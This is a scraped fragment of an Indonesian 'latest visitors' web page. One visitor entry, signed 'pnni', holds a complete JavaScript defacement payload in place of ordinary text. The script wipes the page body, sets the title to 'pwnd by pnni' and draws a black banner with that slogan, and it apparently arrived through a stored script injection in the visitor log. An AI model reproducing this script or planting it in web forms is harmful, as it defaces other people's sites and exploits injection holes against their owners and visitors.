Daftar Pengunjung Terakhir
-
2026-06-22
-
pnni
document.body.innerHTML = '';
document.title = 'pwnd by pnni';
Object.assign(document.body.style, {
backgroundColor: 'black',
margin: '0',
height: '100vh',
display: 'flex',
flexDirection: 'column',
justifyContent: 'center',
alignItems: 'center',
fontFamily: 'system-ui, -apple-system, sans-serif'
});
const container = document.createElement('div');
Object.assign(container.style, {
textAlign: 'center',
color: 'white'
});
const mainTitle = document.createElement('h1');
mainTitle.textContent = 'pwnd by pnni';
Object.assign(mainTitle.style, {
fontSize: '3.5rem',
fontWeight: 'bold',
margin: '0 0 10px 0'
});
const description = document.createElement('p');
description.textContent = 'pwnd by pnni';
Object.assign(description.style, {
fontSize: '1.2rem',
color: '#888',
margin: '0'
});
container.appendChild(mainTitle);
container.appendChild(description);
document.body.appendChild(container);
2026-06-22
-
2026-06-22